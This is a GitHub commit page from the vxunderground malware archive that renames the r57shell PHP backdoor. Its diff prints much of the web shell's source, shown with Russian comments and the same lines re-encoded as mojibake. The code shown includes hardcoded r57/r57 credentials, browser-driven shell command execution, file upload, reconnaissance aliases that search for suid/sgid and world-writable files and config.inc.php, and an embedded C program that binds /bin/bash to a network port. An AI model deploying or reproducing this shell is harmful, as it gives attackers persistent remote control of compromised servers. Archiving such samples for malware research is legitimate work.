Rename Backdoor.PHP.Rst.am to Backdoor.PHP.R57.a
This commit is contained in:
vxunderground
GitHub
parent
772532d020
commit
def1cb17c6
|
|
@ -10,33 +10,33 @@
|
|||
/*
|
||||
/* SPECIAL xbIx birthday edition
|
||||
/*
|
||||
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
|
||||
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru или www.rsteam.ru
|
||||
/* Версия 1.0 beta (писалась практически на коленке... так что код сыроват... для тестирования)
|
||||
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
|
||||
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru
|
||||
/* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ)
|
||||
/*
|
||||
/* Возможности:
|
||||
/* ~ защита скрипта с помощью пароля
|
||||
/* ~ выполнение шелл-команд
|
||||
/* ~ загрузка файлов на сервер
|
||||
/* ~ поддерживает алиасы команд
|
||||
/* ~ включены 4 алиаса команд:
|
||||
/* - поиск на сервере всех файлов с suid битом
|
||||
/* - поиск на сервере всех файлов с sgid битом
|
||||
/* - поиск на сервере файлов config.inc.php
|
||||
/* - поиск на сервере всех директорий и файлов доступных на запись для всех
|
||||
/* ~ два языка интерфейса: русский, английский
|
||||
/* ~ возможность забиндить /bin/bash на определенный порт
|
||||
/* Âîçìîæíîñòè:
|
||||
/* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
|
||||
/* ~ âûïîëíåíèå øåëë-êîìàíä
|
||||
/* ~ çàãðóçêà ôàéëîâ íà ñåðâåð
|
||||
/* ~ ïîääåðæèâàåò àëèàñû êîìàíä
|
||||
/* ~ âêëþ÷åíû 4 àëèàñà êîìàíä:
|
||||
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
|
||||
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
|
||||
/* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
|
||||
/* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
|
||||
/* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
|
||||
/* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò
|
||||
/*
|
||||
/* 05.03.2004 (c) RusH security team
|
||||
/*
|
||||
/******************************************************************************************************/
|
||||
|
||||
## Аутентификация
|
||||
## Àóòåíòèôèêàöèÿ
|
||||
|
||||
## Логин и пароль для доступа к скрипту
|
||||
## НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
|
||||
$name="r57"; ## логин пользователя
|
||||
$pass="r57"; ## пароль пользователя
|
||||
## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
|
||||
## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
|
||||
$name="r57"; ## ëîãèí ïîëüçîâàòåëÿ
|
||||
$pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ
|
||||
|
||||
if(!isset($PHP_AUTH_USER))
|
||||
{
|
||||
|
|
@ -59,28 +59,28 @@ set_time_limit(0);
|
|||
|
||||
|
||||
/*
|
||||
Выбор языка
|
||||
$language='ru' - русский
|
||||
$language='eng' - английский
|
||||
Âûáîð ÿçûêà
|
||||
$language='ru' - ðóññêèé
|
||||
$language='eng' - àíãëèéñêèé
|
||||
*/
|
||||
|
||||
$language='ru';
|
||||
|
||||
$lang=array(
|
||||
'ru_text1' => 'Выполненная команда',
|
||||
'ru_text2' => 'Выполнение команд на сервере',
|
||||
'ru_text3' => 'Выполнить команду',
|
||||
'ru_text4' => 'Рабочая директория',
|
||||
'ru_text5' => 'Загрузка файлов на сервер',
|
||||
'ru_text6' => 'Локальный файл',
|
||||
'ru_text7' => 'Алиасы',
|
||||
'ru_text8' => 'Выберите алиас',
|
||||
'ru_butt1' => 'Выполнить',
|
||||
'ru_butt2' => 'Загрузить',
|
||||
'ru_text9' => 'Открытие порта и привязка его к /bin/bash',
|
||||
'ru_text10' => 'Открыть порт',
|
||||
'ru_text11' => 'Пароль для доступа',
|
||||
'ru_butt3' => 'Открыть',
|
||||
'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
|
||||
'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
|
||||
'ru_text3' => 'Âûïîëíèòü êîìàíäó',
|
||||
'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
|
||||
'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
|
||||
'ru_text6' => 'Ëîêàëüíûé ôàéë',
|
||||
'ru_text7' => 'Àëèàñû',
|
||||
'ru_text8' => 'Âûáåðèòå àëèàñ',
|
||||
'ru_butt1' => 'Âûïîëíèòü',
|
||||
'ru_butt2' => 'Çàãðóçèòü',
|
||||
'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
|
||||
'ru_text10' => 'Îòêðûòü ïîðò',
|
||||
'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
|
||||
'ru_butt3' => 'Îòêðûòü',
|
||||
|
||||
'eng_text1' => 'Executed command',
|
||||
'eng_text2' => 'Execute command on server',
|
||||
|
|
@ -101,22 +101,22 @@ $lang=array(
|
|||
|
||||
|
||||
/*
|
||||
Алиасы команд
|
||||
Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени )
|
||||
Вы можете сами добавлять или изменять команды.
|
||||
Àëèàñû êîìàíä
|
||||
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
|
||||
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
|
||||
*/
|
||||
|
||||
$aliases=array(
|
||||
/* поиск на сервере всех файлов с suid битом */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
||||
'find all suid files' => 'find / -type f -perm -04000 -ls',
|
||||
|
||||
/* поиск на сервере всех файлов с sgid битом */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||
'find all sgid files' => 'find / -type f -perm -02000 -ls',
|
||||
|
||||
/* поиск на сервере файлов config.inc.php */
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
||||
'find config.inc.php files' => 'find / -type f -name config.inc.php',
|
||||
|
||||
/* поиск на сервере всех директорий и файлов доступных на запись для всех */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find writable directories and files' => 'find / -perm -2 -ls',
|
||||
'----------------------------------------------------------------------------------------------------' => 'ls -la'
|
||||
);
|
||||
|
|
@ -137,7 +137,7 @@ int sockfd, newfd;
|
|||
char buf[30];
|
||||
struct sockaddr_in remote;
|
||||
if(argc < 3) usage(argv[0]);
|
||||
if(fork() == 0) { // Ответвляем новый процесс
|
||||
if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ
|
||||
remote.sin_family = AF_INET;
|
||||
remote.sin_port = htons(atoi(argv[1]));
|
||||
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
|
|
@ -178,7 +178,7 @@ return 0;
|
|||
}";
|
||||
|
||||
?>
|
||||
<!-- Здравствуй Вася -->
|
||||
<!-- Çäðàâñòâóé Âàñÿ -->
|
||||
<html>
|
||||
<head>
|
||||
<title>r57shell</title>
|
||||
|
|
@ -322,9 +322,9 @@ echo "</b>";
|
|||
/* command execute form */
|
||||
echo "<form name=command method=post>";
|
||||
echo "<font face=Verdana size=-2>";
|
||||
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
echo "<input type=text name=cmd size=85> <br>";
|
||||
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
|
||||
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
|
||||
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
|
||||
|
|
@ -339,7 +339,7 @@ echo "</form>";
|
|||
/* file upload form */
|
||||
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
|
||||
echo "<font face=Verdana size=-2>";
|
||||
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
echo "<input type=file name=userfile size=85> ";
|
||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||
|
|
@ -355,7 +355,7 @@ echo "</form>";
|
|||
/* aliases form */
|
||||
echo "<form name=aliases method=POST>";
|
||||
echo "<font face=Verdana size=-2>";
|
||||
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
echo "<select name=alias>";
|
||||
foreach ($aliases as $alias_name=>$alias_cmd)
|
||||
{
|
||||
|
|
@ -378,9 +378,9 @@ echo "</form>";
|
|||
/* port bind form */
|
||||
echo "<form name=bind method=POST>";
|
||||
echo "<font face=Verdana size=-2>";
|
||||
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
echo "<input type=text name=port size=15 value=11457> ";
|
||||
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>и</font> </b>";
|
||||
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>è</font> </b>";
|
||||
echo "<input type=text name=bind_pass size=15 value=r57> ";
|
||||
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
|
||||
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
|
||||
Loading…
Reference in New Issue